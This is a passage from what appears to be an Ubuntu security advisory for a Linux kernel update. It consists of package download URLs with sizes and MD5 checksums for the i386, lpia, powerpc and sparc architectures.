  Size/MD5:   534130 2d58da5dee752af1baedeb14a08c5f96
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   128170 4723852ff55df632006c4927d13f114f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    49746 a976e85f8ee996273f27a347df71a409
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   295730 69eac5e852238c1a21440a9241b14832
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:  4196436 e5b97c5775a2511f10966890095da19f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-386_2.6.31-22.60_i386.deb
  Size/MD5:   685230 67f5b3274f3a20bb452797106ec9f137
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb
  Size/MD5:   687020 7d21f4a09ce0a273cb6d7503e72ee6ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_i386.deb
  Size/MD5:   686244 65573f1a4fa26cf1d025885ba2cebbbc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-386_2.6.31-22.60_i386.deb
  Size/MD5: 28823902 18b1320dcc9bc2283011911c04237711
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb
  Size/MD5: 28958792 dc3e36f69d9881d9d26e8cd2c44800cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic_2.6.31-22.60_i386.deb
  Size/MD5: 28891678 aae1afae57ad58337b6454bb13ae72a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_i386.deb
  Size/MD5: 11300176 dc82553b7990534cc39f9f4cc4e00f87
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_i386.deb
  Size/MD5:   753460 b871864698fe96c8c053de1ab7d28b3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   172874 cf867621a1c6af7d2df0b32c31d47f3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   186174 421f2c1b6a7a9211742bcd0116d5b16e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    28924 bf4c063e743601b1838970be5eb4665f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   292874 8b3015efe3f52550b68f137e72be5632
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:  2400172 d3a5e3e28a6f54f5ac55255fefe8d753
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   142002 863be5985847e2c869ccb738ea6eacf7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   189594 5451c54d33a9917ef47a39385a2d60a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   148538 4f7e33f693ccc7d0fd540942fef72b5a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    35292 8faa6b0d2be91563e4f946a97752a550
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:     6840 152a8cf38c19823497507b9f3663df86
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    86104 cf1457aa150576d327043920a45cff27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    46424 b2baacb7c5ffe63175430863e7d6878e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:     8918 9b41564f8be9827daa0254d9308ea154
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    36282 291e645259303b5c8802e64740569845
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    21668 467a00b25bb160d9e117fc910f31784a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:  1495340 ac8a383261c23880b7f2f98dc9ca0f97
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    44088 12d57d9e5921a6694e98f72cd661a89f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    48548 06ffbb6a1b5d63dd5187dc4c96d81004
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:   117862 334d8feda1b33280c0c767eb59fc8941
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb
  Size/MD5:    14532 28a556e15bd25cacb435f06bc40de557

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   198816 cabad71083cee31770876846c9b3e5f0
http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    32446 6aff2bbc6e25c9ed6dfe471c79f9e63e
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    49948 a322353219ca799650b5726a6c06b1d6
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    42156 bb1c584d16c683ad60b94886115201bc
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    45934 ce7abfdde991057d5de236cc7c92dd06
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    87392 5a3de6c8b7e9f7789d180572b09dc2ff
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    33758 73cb370ad891451b4d0bc88705010ae2
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   534312 6deae522a3c870b57491d1da33d886bd
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   128220 9301688d4020d499ed969748cb732bdc
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    49750 c3fc2a64a7415c42a60be5284785ac0c
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   295734 7b6c3dfa99d318e9202a33348b0b7f40
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:  4197456 d122014f54ef4ab940dc19ec321d6286
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-lpia_2.6.31-22.60_lpia.deb
  Size/MD5:   684840 c139f2a52780e291cc978594db715c14
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-lpia_2.6.31-22.60_lpia.deb
  Size/MD5: 28892608 4bf6a29734b5aa254ca96d4c0f26ff29
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_lpia.deb
  Size/MD5:   753444 9e4b00e5d9f5a894ba2e088c3d15e280
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   172932 8478bc14f1f14a05a4e93b2356428c29
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   186154 49c9a729f5b7cd5f127d8f45437dd162
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    28912 267006f0a11aaf673cf8f3b3f3abaeb5
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   292858 7761b4f00c9257ce5b7873d76f1c5ea4
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:  2400346 e2ab63a68d1afb4b84de59722af76fad
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   141982 32b0be2ea446d44c0796ead47f311aed
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   189584 29474120e1018740d2cedd3c560d0c1f
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   148528 8a3914c5c04e9967f99d5b71f0630c22
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    35292 fc88bbd3fd4ada2002bdbb7dda4784bf
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:     6828 495fe0c7945276ad8055ff66aef0c870
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    86098 309c17f97610d6901a49ec7deee22282
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    46412 3a56ab298ad69fa20a59243dc90d91b3
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:     8900 dbb82fccbacffd5147b0a4ba42e73fb0
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    36270 f275023b9b741f5383a4adcb3c20d8fc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    21666 a10e2c6899f03445dc3fd431b04e389b
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:  1495072 a60482e79efeafe8f7c5544b7aac4d25
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    44064 c5c8d43cdfedaf45b3bcb0ad5cebcf5e
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    48540 a81308e2c1a4e85467c70dc11586a35e
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:   117832 0fdbb4919cd2f93e13304a484a76b890
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb
  Size/MD5:    14516 f87cbe777565bffc6791d917445a8ed2

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   321492 a6e3955497936e2d8d21d663f79217a8
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   263650 c39b24ef95a57138b0c8c29d8ebd1db1
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    58862 623da2e39d70d011def84a9876f404f7
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    67046 b7ef32e1debe5e3897b29bf892a205a3
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    45932 ad59fb0a080fbd3f0c54c489fc1a2b41
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    51298 255d5493db43cfcb76868955f47e11a6
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    90698 549cbf218bbe9b9ca431c42995dd0895
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   105162 f4a5cdf80fdb0d8b50b66266e2a67600
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    39486 1cc5b805673f1e8ca877d80199bd35be
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    39270 c80c6ee3f07888fa3c6f3c6147bf9a9c
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   581030 48870bec4d7c78fbc4d447935a7fed0a
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   626342 71f4768f5551e771ab87f2621da8097b
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   149306 ce090bfc2dd1317de4d461e605d74101
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   147320 b3947ba223bd39bce44748fb8a737100
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    79708 998771d5afc49f155a7a028446f0386a
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    84132 677a36642f9fa2d4ac4876e7c4c8588e
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   402940 f38251cc951d684a5052d3765152fdac
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   342490 bbb42db83979db7bddad061bd10c19a3
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  3838604 3dc50a2b64f2864947576cfdb07c8ccd
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  5223500 d454911ee6879d2a8e3e09ef756525a0
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb
  Size/MD5:   795016 dc961bb4deb5e0f7cc8594d3b42fcccd
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb
  Size/MD5:   813182 cfdf6137c9db4ff068f8377641a6f994
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb
  Size/MD5:   794466 7098cc192d736432f69d6461b6b2f1e5
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb
  Size/MD5: 24881134 d3a7996bfa4ca9d00ffa138e8af07a65
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb
  Size/MD5: 25859358 1896b217a23fecdef7fa4f4108b5a39d
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb
  Size/MD5: 24711328 090a1826d0b29376957bd285a00bec55
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_powerpc.deb
  Size/MD5:   738524 6a069b9d476c1302d17b59b97d9f5fef
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   272172 ed7a1d4d22a74235e0e945cd00618b3b
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   294756 b0fda03144d279b6d8c11ba4a151ff0b
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   210594 c2dbac3b914f766e9eef15e760579805
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   217030 6f3106804d19966c219d7f3ef60e7ec0
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    26370 4918a8a9b630381d08931f36e98a6ba3
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    29680 dbf2a64751a6b805c38a2671588cd55b
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   315082 c4cc05ae803543c34dbc5b84bb506fc6
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   357610 169b16c940142485d187019ae62dfba3
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  2027744 72cac22305c06de13610f3e4cb732000
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  2247756 eeac477bd4452047bd4e054438ce5ae1
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   213540 539abf10cc8075cff2aaeb7a5d2a4415
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   209828 07bf91d64a9c1ca41d847d1d45145859
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   210294 d03b6378e07b7d16a8060805d5a33a1e
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   244890 35b7664b5b7866124f07498565492550
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   111850 76a16b3ec983c1456a847b74b058c84d
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   131634 42b2955a56db91a6734e79fabe4b6eb7
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    49036 9f95af70a86ea344deb82828097f33ac
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    44086 d8d27fda02b3a2eccd1bb295513b0ae2
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:     5848 ca06ac8de8f328c81d274625018c28dc
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:     6510 19263161420a4414cca39b3e176ed1fe
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    79130 f9547fa7a009cfc1fdace53f207e66e0
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    85236 783f47a75d9e82f999273ae34ecb2bad
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    74332 09ced5601534f6721803bc936d4474a6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    27270 8fca637189a591b726e81d9f759de81e
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:     8542 5e50b93423cef9abfa0e1224b0706042
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:     9816 645a211d3b5072ddfd2494355f612081
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    58820 d1e640be1163d46f9c4d30f16bc5d489
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    70146 df3e05fd190bbdee466474050abf6d4d
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    23716 df0ec1c32f484026626eba3aceee8bd0
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    30798 d34084fae6d01f175c520a7ee88ae885
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  1557496 8b2c2babeeb812ff28154713e33b68fc
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:  1509500 140ca736b92247392b5f7a81c6112824
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    81652 2f7f7e13c32879ede7d9444b7d0d82c1
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    88506 eb5516ed210ea0daef38e35a63497716
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    64574 93994b13239fa750556d18cc981ead23
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:    77178 88f35d2608a8c3e187ffddbc1d1249cc
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   141566 1705c06d42087933e0bc8078790c00d1
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb
  Size/MD5:   151400 5a4f2e223dd56b134c2a1bd52a5fdab6

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:   139446 c7baab61c8a09b5ebef664ba84316425
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:    70116 cbc95ad9771e8414cdf22bc424b7e257
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:    46514 6cd9a6fed2a5aae88598be99e139952a
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:    93986 5eac60dfd4283e77a7ced7e36f4bda4c
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:   588776 425ae2acd1afcbeff7468ea90c778300
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:   148400 5cf7b0187e50f5c17a0a951650ad19ff
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:    75882 089f804226b3cac5e0f007704b5fbc3e
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:  2915232 bdb3bc98fccde0f109a49486b8f4fd79
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64-smp_2.6.31-22.60_sparc.deb
  Size/MD5:   612074 601db402e4c301ea1f3c7838655e4bf2
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb
  Size/MD5:   611672 5611adee164ba7997a9dc6a35cc03919
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-sparc64-smp_2.6.31-22.60_sparc.deb
  Size/MD5: 20554024 4ad3050a3a26f3470c2df6cf32ea12a2
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb
  Size/MD5: 20242858 42fa813a7d01a6864dc27d8b5602afee
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_sparc.deb
  Size/MD5:   750612 8957e1fb11e133d1e6c056ae25fb1921
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:   266438 128f34223118495af4a21daf6fbf9099
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:   209154 a2f428054c4405bb238d2be5dc54ce17
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:    26792 1ca186e1ac28aa3aff15bdd6060d07bd
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:   314212 212236bfb1dc174322ca6e9f277de47b
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:  1675454 da2055579d886793a3ff4c0118f451d6
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:   222868 bedf62d04baa61688881e77c64fa7c15
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb
  Size/MD5:   121974 b1b8381f0c79f3b6466d6baf71446f08
